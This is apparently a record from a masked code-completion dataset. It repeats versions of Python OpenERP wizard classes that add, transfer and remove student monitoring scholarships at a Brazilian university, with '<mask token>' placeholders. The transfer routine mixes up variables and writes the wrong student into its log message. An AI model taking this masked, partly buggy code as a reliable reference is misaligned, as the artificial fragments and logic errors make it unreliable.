doc_discente_id}}\n return {'value': {'doc_discente_id': False}}\n\n def botao_remover(self, cr, uid, ids, context=None):\n perfil_model = self.pool.get('ud.perfil')\n pessoa_model = self.pool.get('ud.employee')\n for rem in self.browse(cr, uid, ids, context):\n responsavel = pessoa_model.search(cr, SUPERUSER_ID, [('user_id',\n '=', uid)], limit=2)\n if not responsavel:\n raise osv.except_osv(u'Registro Inexistente',\n u'Não é possível realizar essa alteração enquanto seu login não estiver vinculado ao núcleo'\n )\n if len(responsavel) > 1:\n raise osv.except_osv(u'Multiplos vínculos',\n u'Não é possível realizar essa alteração enquanto seu login possuir multiplos vínculos no núcleo'\n )\n perfil = rem.doc_discente_id.inscricao_id.perfil_id\n perfil_model.write(cr, SUPERUSER_ID, perfil.id, {'is_bolsista':\n False, 'tipo_bolsa': False, 'valor_bolsa': False})\n rem.doc_discente_id.write({'state': 'n_bolsista'})\n evento = {'responsavel_id': responsavel[0], 'name': \n u'Remoção de bolsa: \"%s\"' % rem.doc_discente_id.discente_id\n .name, 'envolvidos_ids': [(4, rem.doc_discente_id.\n discente_id.id)], 'descricao': \n u'A bolsa do discente \"%s\" sob matrícula \"%s\" foi removida.' %\n (rem.doc_discente_id.discente_id.name.upper(), perfil.\n matricula)}\n rem.semestre_id.write({'eventos_ids': [(0, 0, evento)]})\n return True\n",
"step-2": "<mask token>\n\n\nclass AdicionarBolsaWizard(osv.TransientModel):\n <mask token>\n <mask token>\n <mask token>\n\n def _bolsas(self, cr, uid, ids, campos, args, context=None):\n oferta_model = self.pool.get('ud.monitoria.oferta.disciplina')\n res = {}\n for add in self.browse(cr, uid, ids, context):\n res[add.id] = add.disciplina_id.bolsas\n return res\n <mask token>\n\n def default_get(self, cr, uid, fields_list, context=None):\n res = super(AdicionarBolsaWizard, self).default_get(cr, uid,\n fields_list, context)\n res['status'] = 'n_bolsista'\n res['valor_bolsa'] = 400.0\n context = context or {}\n if context.get('active_id', False):\n if context.get('active_model', False) == 'ud.monitoria.registro':\n res['semestre_id'] = context.get('active_id')\n elif context.get('active_model', False\n ) == 'ud.monitoria.documentos.discente':\n doc = self.pool.get('ud.monitoria.documentos.discente').browse(\n cr, uid, context.get('active_id'), context)\n if doc.state == 'bolsista':\n raise osv.except_osv(u'Discente bolsista',\n u'O discente já é bolsista')\n elif not doc.is_active:\n raise osv.except_osv(u'Documento do discente inativo',\n u'Não é possível alterar o status de discentes inativos'\n )\n res['semestre_id'] = doc.disciplina_id.semestre_id.id\n res['curso_id'] = doc.disciplina_id.curso_id.id\n res['disciplina_id'] = doc.disciplina_id.id\n res['tutor'] = doc.tutor\n res['status'] = doc.state\n res['doc_discente_id'] = doc.id\n return res\n\n def onchange_curso(self, cr, uid, ids, semestre_id, curso_id,\n disciplina_id, context=None):\n if not (semestre_id and curso_id):\n return {'value': {'disciplina_id': False}}\n reg = self.pool.get('ud.monitoria.registro').read(cr, uid,\n semestre_id, ['processos_seletivos_ids'], context=context, load\n ='_classic_write')\n args = [('curso_id', '=', curso_id), ('processo_seletivo_id', '=',\n reg['processos_seletivos_ids']), ('is_active', '=', True)]\n disc = self.pool.get('ud.monitoria.disciplina').search(cr, uid,\n args, context=context)\n res = {'domain': {'disciplina_id': [('id', 'in', disc)]}}\n if not disc:\n res['value'] = {'disciplina_id': False}\n return res\n\n def onchange_disciplina(self, cr, uid, ids, disciplina_id,\n doc_discente_id, context=None):\n if disciplina_id:\n if doc_discente_id:\n doc_discente = self.pool.get('ud.monitoria.documentos.discente'\n ).browse(cr, uid, doc_discente_id, context)\n doc_discente_id = (doc_discente_id if doc_discente.\n disciplina_id.id == disciplina_id else False)\n disciplina_id = self.pool.get('ud.monitoria.disciplina').browse(cr,\n uid, disciplina_id, context)\n return {'value': {'doc_discente_id': doc_discente_id, 'bolsas':\n disciplina_id.bolsas}}\n return {'value': {'doc_discente_id': False, 'bolsas': 0}}\n\n def onchange_doc_discente(self, cr, uid, ids, doc_discente_id,\n dados_bancarios_id, context=None):\n if doc_discente_id:\n doc = self.pool.get('ud.monitoria.documentos.discente').browse(cr,\n uid, doc_discente_id, context)\n if not dados_bancarios_id:\n dados_bancarios_id = getattr(doc.dados_bancarios_id, 'id', \n False)\n return {'value': {'dados_bancarios_id': dados_bancarios_id},\n 'domain': {'dados_bancarios_id': [('ud_conta_id', '=', doc.\n discente_id.id)]}}\n return {'value': {'dados_bancarios_id': False}, 'domain': {\n 'dados_bancarios_id': [('id', '=', False)]}}\n <mask token>\n\n def botao_adicionar(self, cr, uid, ids, context=None):\n perfil_model = self.pool.get('ud.perfil')\n for add in self.browse(cr, uid, ids, context):\n if add.bolsas == 0:\n raise osv.except_osv(u'Bolsas Insuficientes',\n u'Não há bolsas disponíveis para essa disciplina')\n elif not add.doc_discente_id.is_active:\n raise osv.except_osv(u'Documento do discente inativo',\n u'O discente não pode ser classificado como bolsista')\n if add.doc_discente_id.inscricao_id.perfil_id.is_bolsista:\n raise osv.except_osv(u'Discente bolsista',\n u'O discente \"{}\" sob matrícula \"{}\" possui bolsa do tipo: \"{}\"'\n .format(add.doc_discente_id.discente_id.name, add.\n doc_discente_id.inscricao_id.perfil_id.matricula,\n TIPOS_BOLSA[add.doc_discente_id.inscricao_id.perfil_id.\n tipo_bolsa]))\n responsavel = self.pool.get('ud.employee').search(cr,\n SUPERUSER_ID, [('user_id', '=', uid)], limit=2)\n if not responsavel:\n raise osv.except_osv(u'Registro Inexistente',\n u'Não é possível realizar essa alteração enquanto seu login não estiver vinculado a uma pessoa no núcleo'\n )\n if len(responsavel) > 1:\n raise osv.except_osv(u'Multiplos vínculos',\n u'Não é possível realizar essa alteração enquanto seu login possuir multiplos vínculos no núcleo'\n )\n perfil_model.write(cr, SUPERUSER_ID, add.doc_discente_id.\n inscricao_id.perfil_id.id, {'is_bolsista': True,\n 'tipo_bolsa': 'm', 'valor_bolsa': ('%.2f' % add.valor_bolsa\n ).replace('.', ',')})\n if not add.dados_bancarios_id:\n dados_bancarios = get_banco(self, cr, add, add.\n doc_discente_id.discente_id.id, context)\n else:\n dados_bancarios = add.dados_bancarios_id.id\n add.doc_discente_id.write({'state': 'bolsista',\n 'dados_bancarios_id': dados_bancarios})\n evento = {'responsavel_id': responsavel[0], 'name': \n u'Adição de bolsa: \"%s\"' % add.doc_discente_id.discente_id.\n name, 'envolvidos_ids': [(4, add.doc_discente_id.\n discente_id.id)], 'descricao': \n u'Uma bolsa de R$ %s foi vinculada para o(a) discente \"%s\" sob matrícula \"%s\".'\n % (('%.2f' % add.valor_bolsa).replace('.', ','), add.\n doc_discente_id.discente_id.name.upper(), add.\n doc_discente_id.inscricao_id.perfil_id.matricula)}\n add.semestre_id.write({'eventos_ids': [(0, 0, evento)]})\n return True\n\n\nclass TransferirBolsaWizard(osv.TransientModel):\n _name = 'ud.monitoria.bolsa.transferir.wizard'\n _description = u'Transferência de bolsa de monitoria (UD)'\n _STATES = [('n_bolsista', u'Não Bolsista'), ('reserva',\n u'Cadastro de Reserva')]\n _columns = {'semestre_id': fields.many2one('ud.monitoria.registro',\n u'Semestre', required=True, readonly=True), 'curso_id_de': fields.\n many2one('ud.curso', u'Curso', required=True, domain=\n \"[('is_active', '=', True)]\"), 'disciplina_id_de': fields.many2one(\n 'ud.monitoria.disciplina', u'Disciplinas', required=True, domain=\n \"[('id', '=', False)]\"), 'tutor_de': fields.boolean(u'Tutor?'),\n 'doc_discente_id_de': fields.many2one(\n 'ud.monitoria.documentos.discente', u'Discente', required=True,\n domain=\n \"[('is_active', '=', True), ('state', '=', 'bolsista'), ('disciplina_id', '=', disciplina_id_de), ('tutor', '=', tutor_de)]\"\n ), 'curso_id_para': fields.many2one('ud.curso', u'Curso', required=\n True, domain=\"[('is_active', '=', True)]\"), 'disciplina_id_para':\n fields.many2one('ud.monitoria.disciplina', u'Disciplinas', required\n =True, domain=\n \"[('semestre_id', '=', semestre_id), ('curso_id', '=', curso_id_para), ('is_active', '=', True)]\"\n ), 'tutor_para': fields.boolean(u'Tutor?'), 'status_para': fields.\n selection(_STATES, u'Status', required=True),\n 'doc_discente_id_para': fields.many2one(\n 'ud.monitoria.documentos.discente', u'Discente', required=True,\n domain=\n \"[('is_active', '=', True), ('state', '=', status_para), ('disciplina_id', '=', disciplina_id_para), ('tutor', '=', tutor_para)]\"\n ), 'banco_id': fields.many2one('ud.banco', u'Banco', ondelete=\n 'restrict'), 'agencia': fields.char(u'Agência', size=4, help=\n u'Número da Agência'), 'dv_agencia': fields.char(u'DV Agência',\n size=2, help=u'Dígito verificador da Agência'), 'conta': fields.\n char(u'Conta', size=10, help=u'Número da Conta'), 'dv_conta':\n fields.char(u'DV Conta', size=1, help=\n u'Dígito verificador da Conta'), 'operacao': fields.char(\n u'Operação', size=3, help=u'Tipo de conta'), 'agencia_v': fields.\n related('banco_id', 'agencia', type='boolean', invisible=True,\n readonly=True), 'dv_agencia_v': fields.related('banco_id',\n 'dv_agencia', type='boolean', invisible=True, readonly=True),\n 'conta_v': fields.related('banco_id', 'conta', type='boolean',\n invisible=True, readonly=True), 'dv_conta_v': fields.related(\n 'banco_id', 'dv_conta', type='boolean', invisible=True, readonly=\n True), 'operacao_v': fields.related('banco_id', 'operacao', type=\n 'boolean', invisible=True, readonly=True)}\n\n def default_get(self, cr, uid, fields_list, context=None):\n res = super(TransferirBolsaWizard, self).default_get(cr, uid,\n fields_list, context)\n context = context or {}\n if context.get('active_id', False):\n if context.get('active_model', False) == 'ud.monitoria.registro':\n res['semestre_id'] = context.get('active_id')\n elif context.get('active_model', False\n ) == 'ud.monitoria.documentos.discente':\n doc = self.pool.get('ud.monitoria.documentos.discente').browse(\n cr, uid, context.get('active_id'), context)\n if doc.state != 'bolsista':\n raise osv.except_osv(u'Discente bolsista',\n u'O discente já é bolsista')\n elif not doc.is_active:\n raise osv.except_osv(u'Documento do discente inativo',\n u'O discente não pode ser classificado como bolsista')\n res['semestre_id'] = doc.disciplina_id.semestre_id.id\n res['curso_id_de'] = doc.disciplina_id.curso_id.id\n res['disciplina_id_de'] = doc.disciplina_id.id\n res['tutor_de'] = doc.tutor\n res['status_de'] = doc.state\n res['doc_discente_id_de'] = doc.id\n return res\n\n def onchange_curso(self, cr, uid, ids, comp, semestre_id, curso_id,\n disciplina_id, context=None):\n if not (semestre_id and curso_id):\n return {'value': {('disciplina_id_' + comp): False}}\n reg = self.pool.get('ud.monitoria.registro').read(cr, uid,\n semestre_id, ['processos_seletivos_ids'], context=context, load\n ='_classic_write')\n args = [('curso_id', '=', curso_id), ('processo_seletivo_id', '=',\n reg['processos_seletivos_ids']), ('is_active', '=', True)]\n disc = self.pool.get('ud.monitoria.disciplina').search(cr, uid,\n args, context=context)\n res = {'domain': {('disciplina_id_' + comp): [('id', 'in', disc)]}}\n if not disc:\n res['value'] = {('disciplina_id_' + comp): False}\n return res\n\n def onchange_disciplina(self, cr, uid, ids, comp, disciplina_id,\n doc_discente_id, context=None):\n if disciplina_id and doc_discente_id:\n doc_discente = self.pool.get('ud.monitoria.documentos.discente'\n ).browse(cr, uid, doc_discente_id, context)\n doc_discente_id = (doc_discente_id if doc_discente.\n disciplina_id.id == disciplina_id else False)\n return {'value': {('doc_discente_id_' + comp): doc_discente_id}}\n return {'value': {('doc_discente_id_' + comp): False}}\n\n def onchange_banco(self, cr, uid, ids, banco_id, context=None):\n if banco_id:\n banco = self.pool.get('ud.banco').read(cr, uid, banco_id, [\n 'agencia', 'dv_agencia', 'conta', 'dv_conta', 'operacao'],\n context=context, load='_classic_write')\n vals = {'agencia': False, 'dv_agencia': False, 'conta': False,\n 'dv_conta': False, 'operacao': False}\n vals.update({('%s_v' % dado): banco.get(dado) for dado in banco\n .keys()})\n return {'value': vals}\n return {'value': {'agencia_v': False, 'dv_agencia_v': False,\n 'conta_v': False, 'dv_conta_v': False, 'operacao_v': False,\n 'agencia': False, 'dv_agencia': False, 'conta': False,\n 'dv_conta': False, 'operacao': False}}\n\n def botao_transferir(self, cr, uid, ids, context=None):\n perfil_model = self.pool.get('ud.perfil')\n for transf in self.browse(cr, uid, ids, context):\n matricula = transf.doc_discente_id_para.discente_id.matricula\n for perfil in transf.doc_discente_id_para.discente_id.pessoa_id.papel_ids:\n if perfil.matricula == matricula and perfil.tipo == 'a':\n if perfil.is_bolsista:\n raise osv.except_osv(u'Discente bolsista',\n u'O discente \"{}\" sob matrícula \"{}\" possui bolsa do tipo: \"{}\"'\n .format(transf.doc_discente_id_para.discente_id\n .pessoa_id.name, matricula, TIPOS_BOLSA[perfil.\n tipo_bolsa]))\n break\n if not perfil:\n raise osv.except_osv(u'Perfil excluído', \n u'O perfil do discente para a matrícula \"%s\" não existe ou foi excluído'\n % matricula or '')\n matricula = transf.doc_discente_id_de.discente_id.matricula\n for perfil_de in transf.doc_discente_id_de.discente_id.pessoa_id.papel_ids:\n if perfil.matricula == matricula and perfil.tipo == 'a':\n break\n responsavel = self.pool.get('ud.employee').search(cr,\n SUPERUSER_ID, [('user_id', '=', uid)], limit=2)\n if not responsavel:\n raise osv.except_osv(u'Registro Inexistente',\n u'Não é possível realizar essa alteração enquanto seu login não estiver vinculado ao núcleo'\n )\n if len(responsavel) > 1:\n raise osv.except_osv(u'Multiplos vínculos',\n u'Não é possível realizar essa alteração enquanto seu login possuir multiplos vínculos no núcleo'\n )\n valor = perfil_de.valor_bolsa\n perfil_model.write(cr, SUPERUSER_ID, perfil.id, {'is_bolsista':\n True, 'tipo_bolsa': 'm', 'valor_bolsa': valor})\n perfil_model.write(cr, SUPERUSER_ID, perfil_de.id, {\n 'is_bolsista': False, 'tipo_bolsa': False, 'valor_bolsa': \n False})\n transf.doc_discente_id_de.write({'state': 'n_bolsista'})\n transf.doc_discente_id_para.write({'state': 'bolsista',\n 'is_active': True})\n get_banco(self, cr, transf, transf.doc_discente_id_para.\n discente_id.pessoa_id.id, context)\n evento = {'responsavel_id': responsavel[0], 'name':\n u'Transferência de bolsa', 'envolvidos_ids': [(4, transf.\n doc_discente_id_de.discente_id.pessoa_id.id), (4, transf.\n doc_discente_id_para.discente_id.pessoa_id.id)],\n 'descricao': \n u'Transferência de bolsa no valor de R$ %(valor)s do discente %(discente_de)s sob matrícula %(matricula_de)s para o(a) discente \"%(discente_para)s\" sob matrícula\"%(matricula_para)s\".'\n % {'valor': valor, 'discente_de': transf.\n doc_discente_id_de.discente_id.pessoa_id.name.upper(),\n 'matricula_de': perfil_de.matricula, 'discente_para':\n transf.doc_discente_id_de.discente_id.pessoa_id.name.upper(\n ), 'matricula_para': perfil_de.matricula}}\n transf.semestre_id.write({'eventos_ids': [(0, 0, evento)]})\n return True\n\n\nclass RemoverBolsaWizard(osv.TransientModel):\n _name = 'ud.monitoria.bolsa.remover.wizard'\n _description = u'Remoção de bolsa de discente'\n _columns = {'semestre_id': fields.many2one('ud.monitoria.registro',\n u'Semestre', required=True, readonly=True), 'curso_id': fields.\n many2one('ud.curso', u'Curso', required=True, domain=\n \"[('is_active', '=', True)]\"), 'disciplina_id': fields.many2one(\n 'ud.monitoria.disciplina', u'Disciplinas', required=True, domain=\n \"[('id', '=', False)]\"), 'tutor': fields.boolean(u'Tutor?'),\n 'doc_discente_id': fields.many2one(\n 'ud.monitoria.documentos.discente', u'Discente', required=True,\n domain=\n \"[('disciplina_id', '=', disciplina_id), ('tutor', '=', tutor), ('is_active', '=', True), ('state', '=', 'bolsista')]\"\n )}\n\n def default_get(self, cr, uid, fields_list, context=None):\n res = super(RemoverBolsaWizard, self).default_get(cr, uid,\n fields_list, context)\n context = context or {}\n if context.get('active_id', False):\n if context.get('active_model', False) == 'ud.monitoria.registro':\n res['semestre_id'] = context.get('active_id')\n elif context.get('active_model', False\n ) == 'ud.monitoria.documentos.discente':\n doc = self.pool.get('ud.monitoria.documentos.discente').browse(\n cr, uid, context.get('active_id'), context)\n if doc.state != 'bolsista':\n raise osv.except_osv(u'Discente não bolsista',\n u'O discente não é bolsista')\n elif not doc.is_active:\n raise osv.except_osv(u'Documento do discente inativo',\n u'Não é possível alterar o status de discentes inativos'\n )\n res['semestre_id'] = doc.disciplina_id.semestre_id.id\n res['curso_id'] = doc.disciplina_id.curso_id.id\n res['disciplina_id'] = doc.disciplina_id.id\n res['tutor'] = doc.tutor\n res['doc_discente_id'] = doc.id\n return res\n\n def onchange_curso(self, cr, uid, ids, semestre_id, curso_id,\n disciplina_id, context=None):\n if not (semestre_id and curso_id):\n return {'value': {'disciplina_id': False}}\n reg = self.pool.get('ud.monitoria.registro').read(cr, uid,\n semestre_id, ['processos_seletivos_ids'], context=context, load\n ='_classic_write')\n args = [('curso_id', '=', curso_id), ('processo_seletivo_id', '=',\n reg['processos_seletivos_ids']), ('is_active', '=', True)]\n disc = self.pool.get('ud.monitoria.disciplina').search(cr, uid,\n args, context=context)\n res = {'domain': {'disciplina_id': [('id', 'in', disc)]}}\n if not disc:\n res['value'] = {'disciplina_id': False}\n return res\n\n def onchange_disciplina(self, cr, uid, ids, disciplina_id,\n doc_discente_id, context=None):\n if disciplina_id and doc_discente_id:\n doc_discente = self.pool.get('ud.monitoria.documentos.discente'\n ).browse(cr, uid, doc_discente_id, context)\n doc_discente_id = (doc_discente_id if doc_discente.\n disciplina_id.id == disciplina_id else False)\n return {'value': {'doc_discente_id': doc_discente_id}}\n return {'value': {'doc_discente_id': False}}\n\n def botao_remover(self, cr, uid, ids, context=None):\n perfil_model = self.pool.get('ud.perfil')\n pessoa_model = self.pool.get('ud.employee')\n for rem in self.browse(cr, uid, ids, context):\n responsavel = pessoa_model.search(cr, SUPERUSER_ID, [('user_id',\n '=', uid)], limit=2)\n if not responsavel:\n raise osv.except_osv(u'Registro Inexistente',\n u'Não é possível realizar essa alteração enquanto seu login não estiver vinculado ao núcleo'\n )\n if len(responsavel) > 1:\n raise osv.except_osv(u'Multiplos vínculos',\n u'Não é possível realizar essa alteração enquanto seu login possuir multiplos vínculos no núcleo'\n )\n perfil = rem.doc_discente_id.inscricao_id.perfil_id\n perfil_model.write(cr, SUPERUSER_ID, perfil.id, {'is_bolsista':\n False, 'tipo_bolsa': False, 'valor_bolsa': False})\n rem.doc_discente_id.write({'state': 'n_bolsista'})\n evento = {'responsavel_id': responsavel[0], 'name': \n u'Remoção de bolsa: \"%s\"' % rem.doc_discente_id.discente_id\n .name, 'envolvidos_ids': [(4, rem.doc_discente_id.\n discente_id.id)], 'descricao': \n u'A bolsa do discente \"%s\" sob matrícula \"%s\" foi removida.' %\n (rem.doc_discente_id.discente_id.name.upper(), perfil.\n matricula)}\n rem.semestre_id.write({'eventos_ids': [(0, 0, evento)]})\n return True\n",
"step-3": "<mask token>\n\n\nclass AdicionarBolsaWizard(osv.TransientModel):\n _name = 'ud.monitoria.bolsa.adicionar.wizard'\n _description = u'Inclusão de bolsa de monitoria para discente (UD)'\n _STATES = [('n_bolsista', u'Não Bolsista'), ('reserva',\n u'Cadastro de Reserva')]\n\n def _bolsas(self, cr, uid, ids, campos, args, context=None):\n oferta_model = self.pool.get('ud.monitoria.oferta.disciplina')\n res = {}\n for add in self.browse(cr, uid, ids, context):\n res[add.id] = add.disciplina_id.bolsas\n return res\n _columns = {'semestre_id': fields.many2one('ud.monitoria.registro',\n u'Semestre', required=True, readonly=True), 'curso_id': fields.\n many2one('ud.curso', u'Curso', required=True, domain=\n \"[('is_active', '=', True)]\"), 'disciplina_id': fields.many2one(\n 'ud.monitoria.disciplina', u'Disciplinas', required=True, domain=\n \"[('semestre_id', '=', semestre_id), ('curso_id', '=', curso_id), ('is_active', '=', True)]\"\n ), 'bolsas': fields.function(_bolsas, type='integer', string=\n u'Bolsas disponíveis', help=\n u'Número de bolsas disponíveis para a disciplina'), 'valor_bolsa':\n fields.float(u'Bolsa (R$)'), 'tutor': fields.boolean(u'Tutor?'),\n 'status': fields.selection(_STATES, u'Status', required=True),\n 'doc_discente_id': fields.many2one(\n 'ud.monitoria.documentos.discente', u'Discente', required=True,\n domain=\n \"[('disciplina_id', '=', disciplina_id), ('tutor', '=', tutor), ('is_active', '=', True), ('state', '=', status)]\"\n ), 'dados_bancarios_id': fields.many2one('ud.dados.bancarios',\n u'Dados Bancários', domain=[('id', '=', False)]), 'banco_id':\n fields.many2one('ud.banco', u'Banco', ondelete='restrict'),\n 'agencia': fields.char(u'Agência', size=4, help=\n u'Número da Agência'), 'dv_agencia': fields.char(u'DV Agência',\n size=2, help=u'Dígito verificador da Agência'), 'conta': fields.\n char(u'Conta', size=10, help=u'Número da Conta'), 'dv_conta':\n fields.char(u'DV Conta', size=1, help=\n u'Dígito verificador da Conta'), 'operacao': fields.char(\n u'Operação', size=3, help=u'Tipo de conta'), 'agencia_v': fields.\n related('banco_id', 'agencia', type='boolean', invisible=True,\n readonly=True), 'dv_agencia_v': fields.related('banco_id',\n 'dv_agencia', type='boolean', invisible=True, readonly=True),\n 'conta_v': fields.related('banco_id', 'conta', type='boolean',\n invisible=True, readonly=True), 'dv_conta_v': fields.related(\n 'banco_id', 'dv_conta', type='boolean', invisible=True, readonly=\n True), 'operacao_v': fields.related('banco_id', 'operacao', type=\n 'boolean', invisible=True, readonly=True)}\n\n def default_get(self, cr, uid, fields_list, context=None):\n res = super(AdicionarBolsaWizard, self).default_get(cr, uid,\n fields_list, context)\n res['status'] = 'n_bolsista'\n res['valor_bolsa'] = 400.0\n context = context or {}\n if context.get('active_id', False):\n if context.get('active_model', False) == 'ud.monitoria.registro':\n res['semestre_id'] = context.get('active_id')\n elif context.get('active_model', False\n ) == 'ud.monitoria.documentos.discente':\n doc = self.pool.get('ud.monitoria.documentos.discente').browse(\n cr, uid, context.get('active_id'), context)\n if doc.state == 'bolsista':\n raise osv.except_osv(u'Discente bolsista',\n u'O discente já é bolsista')\n elif not doc.is_active:\n raise osv.except_osv(u'Documento do discente inativo',\n u'Não é possível alterar o status de discentes inativos'\n )\n res['semestre_id'] = doc.disciplina_id.semestre_id.id\n res['curso_id'] = doc.disciplina_id.curso_id.id\n res['disciplina_id'] = doc.disciplina_id.id\n res['tutor'] = doc.tutor\n res['status'] = doc.state\n res['doc_discente_id'] = doc.id\n return res\n\n def onchange_curso(self, cr, uid, ids, semestre_id, curso_id,\n disciplina_id, context=None):\n if not (semestre_id and curso_id):\n return {'value': {'disciplina_id': False}}\n reg = self.pool.get('ud.monitoria.registro').read(cr, uid,\n semestre_id, ['processos_seletivos_ids'], context=context, load\n ='_classic_write')\n args = [('curso_id', '=', curso_id), ('processo_seletivo_id', '=',\n reg['processos_seletivos_ids']), ('is_active', '=', True)]\n disc = self.pool.get('ud.monitoria.disciplina').search(cr, uid,\n args, context=context)\n res = {'domain': {'disciplina_id': [('id', 'in', disc)]}}\n if not disc:\n res['value'] = {'disciplina_id': False}\n return res\n\n def onchange_disciplina(self, cr, uid, ids, disciplina_id,\n doc_discente_id, context=None):\n if disciplina_id:\n if doc_discente_id:\n doc_discente = self.pool.get('ud.monitoria.documentos.discente'\n ).browse(cr, uid, doc_discente_id, context)\n doc_discente_id = (doc_discente_id if doc_discente.\n disciplina_id.id == disciplina_id else False)\n disciplina_id = self.pool.get('ud.monitoria.disciplina').browse(cr,\n uid, disciplina_id, context)\n return {'value': {'doc_discente_id': doc_discente_id, 'bolsas':\n disciplina_id.bolsas}}\n return {'value': {'doc_discente_id': False, 'bolsas': 0}}\n\n def onchange_doc_discente(self, cr, uid, ids, doc_discente_id,\n dados_bancarios_id, context=None):\n if doc_discente_id:\n doc = self.pool.get('ud.monitoria.documentos.discente').browse(cr,\n uid, doc_discente_id, context)\n if not dados_bancarios_id:\n dados_bancarios_id = getattr(doc.dados_bancarios_id, 'id', \n False)\n return {'value': {'dados_bancarios_id': dados_bancarios_id},\n 'domain': {'dados_bancarios_id': [('ud_conta_id', '=', doc.\n discente_id.id)]}}\n return {'value': {'dados_bancarios_id': False}, 'domain': {\n 'dados_bancarios_id': [('id', '=', False)]}}\n\n def onchange_banco(self, cr, uid, ids, banco_id, context=None):\n if banco_id:\n banco = self.pool.get('ud.banco').read(cr, uid, banco_id, [\n 'agencia', 'dv_agencia', 'conta', 'dv_conta', 'operacao'],\n context=context, load='_classic_write')\n vals = {'agencia': False, 'dv_agencia': False, 'conta': False,\n 'dv_conta': False, 'operacao': False}\n vals.update({('%s_v' % dado): banco.get(dado) for dado in banco\n .keys()})\n return {'value': vals}\n return {'value': {'agencia_v': False, 'dv_agencia_v': False,\n 'conta_v': False, 'dv_conta_v': False, 'operacao_v': False,\n 'agencia': False, 'dv_agencia': False, 'conta': False,\n 'dv_conta': False, 'operacao': False}}\n\n def botao_adicionar(self, cr, uid, ids, context=None):\n perfil_model = self.pool.get('ud.perfil')\n for add in self.browse(cr, uid, ids, context):\n if add.bolsas == 0:\n raise osv.except_osv(u'Bolsas Insuficientes',\n u'Não há bolsas disponíveis para essa disciplina')\n elif not add.doc_discente_id.is_active:\n raise osv.except_osv(u'Documento do discente inativo',\n u'O discente não pode ser classificado como bolsista')\n if add.doc_discente_id.inscricao_id.perfil_id.is_bolsista:\n raise osv.except_osv(u'Discente bolsista',\n u'O discente \"{}\" sob matrícula \"{}\" possui bolsa do tipo: \"{}\"'\n .format(add.doc_discente_id.discente_id.name, add.\n doc_discente_id.inscricao_id.perfil_id.matricula,\n TIPOS_BOLSA[add.doc_discente_id.inscricao_id.perfil_id.\n tipo_bolsa]))\n responsavel = self.pool.get('ud.employee').search(cr,\n SUPERUSER_ID, [('user_id', '=', uid)], limit=2)\n if not responsavel:\n raise osv.except_osv(u'Registro Inexistente',\n u'Não é possível realizar essa alteração enquanto seu login não estiver vinculado a uma pessoa no núcleo'\n )\n if len(responsavel) > 1:\n raise osv.except_osv(u'Multiplos vínculos',\n u'Não é possível realizar essa alteração enquanto seu login possuir multiplos vínculos no núcleo'\n )\n perfil_model.write(cr, SUPERUSER_ID, add.doc_discente_id.\n inscricao_id.perfil_id.id, {'is_bolsista': True,\n 'tipo_bolsa': 'm', 'valor_bolsa': ('%.2f' % add.valor_bolsa\n ).replace('.', ',')})\n if not add.dados_bancarios_id:\n dados_bancarios = get_banco(self, cr, add, add.\n doc_discente_id.discente_id.id, context)\n else:\n dados_bancarios = add.dados_bancarios_id.id\n add.doc_discente_id.write({'state': 'bolsista',\n 'dados_bancarios_id': dados_bancarios})\n evento = {'responsavel_id': responsavel[0], 'name': \n u'Adição de bolsa: \"%s\"' % add.doc_discente_id.discente_id.\n name, 'envolvidos_ids': [(4, add.doc_discente_id.\n discente_id.id)], 'descricao': \n u'Uma bolsa de R$ %s foi vinculada para o(a) discente \"%s\" sob matrícula \"%s\".'\n % (('%.2f' % add.valor_bolsa).replace('.', ','), add.\n doc_discente_id.discente_id.name.upper(), add.\n doc_discente_id.inscricao_id.perfil_id.matricula)}\n add.semestre_id.write({'eventos_ids': [(0, 0, evento)]})\n return True\n\n\nclass TransferirBolsaWizard(osv.TransientModel):\n _name = 'ud.monitoria.bolsa.transferir.wizard'\n _description = u'Transferência de bolsa de monitoria (UD)'\n _STATES = [('n_bolsista', u'Não Bolsista'), ('reserva',\n u'Cadastro de Reserva')]\n _columns = {'semestre_id': fields.many2one('ud.monitoria.registro',\n u'Semestre', required=True, readonly=True), 'curso_id_de': fields.\n many2one('ud.curso', u'Curso', required=True, domain=\n \"[('is_active', '=', True)]\"), 'disciplina_id_de': fields.many2one(\n 'ud.monitoria.disciplina', u'Disciplinas', required=True, domain=\n \"[('id', '=', False)]\"), 'tutor_de': fields.boolean(u'Tutor?'),\n 'doc_discente_id_de': fields.many2one(\n 'ud.monitoria.documentos.discente', u'Discente', required=True,\n domain=\n \"[('is_active', '=', True), ('state', '=', 'bolsista'), ('disciplina_id', '=', disciplina_id_de), ('tutor', '=', tutor_de)]\"\n ), 'curso_id_para': fields.many2one('ud.curso', u'Curso', required=\n True, domain=\"[('is_active', '=', True)]\"), 'disciplina_id_para':\n fields.many2one('ud.monitoria.disciplina', u'Disciplinas', required\n =True, domain=\n \"[('semestre_id', '=', semestre_id), ('curso_id', '=', curso_id_para), ('is_active', '=', True)]\"\n ), 'tutor_para': fields.boolean(u'Tutor?'), 'status_para': fields.\n selection(_STATES, u'Status', required=True),\n 'doc_discente_id_para': fields.many2one(\n 'ud.monitoria.documentos.discente', u'Discente', required=True,\n domain=\n \"[('is_active', '=', True), ('state', '=', status_para), ('disciplina_id', '=', disciplina_id_para), ('tutor', '=', tutor_para)]\"\n ), 'banco_id': fields.many2one('ud.banco', u'Banco', ondelete=\n 'restrict'), 'agencia': fields.char(u'Agência', size=4, help=\n u'Número da Agência'), 'dv_agencia': fields.char(u'DV Agência',\n size=2, help=u'Dígito verificador da Agência'), 'conta': fields.\n char(u'Conta', size=10, help=u'Número da Conta'), 'dv_conta':\n fields.char(u'DV Conta', size=1, help=\n u'Dígito verificador da Conta'), 'operacao': fields.char(\n u'Operação', size=3, help=u'Tipo de conta'), 'agencia_v': fields.\n related('banco_id', 'agencia', type='boolean', invisible=True,\n readonly=True), 'dv_agencia_v': fields.related('banco_id',\n 'dv_agencia', type='boolean', invisible=True, readonly=True),\n 'conta_v': fields.related('banco_id', 'conta', type='boolean',\n invisible=True, readonly=True), 'dv_conta_v': fields.related(\n 'banco_id', 'dv_conta', type='boolean', invisible=True, readonly=\n True), 'operacao_v': fields.related('banco_id', 'operacao', type=\n 'boolean', invisible=True, readonly=True)}\n\n def default_get(self, cr, uid, fields_list, context=None):\n res = super(TransferirBolsaWizard, self).default_get(cr, uid,\n fields_list, context)\n context = context or {}\n if context.get('active_id', False):\n if context.get('active_model', False) == 'ud.monitoria.registro':\n res['semestre_id'] = context.get('active_id')\n elif context.get('active_model', False\n ) == 'ud.monitoria.documentos.discente':\n doc = self.pool.get('ud.monitoria.documentos.discente').browse(\n cr, uid, context.get('active_id'), 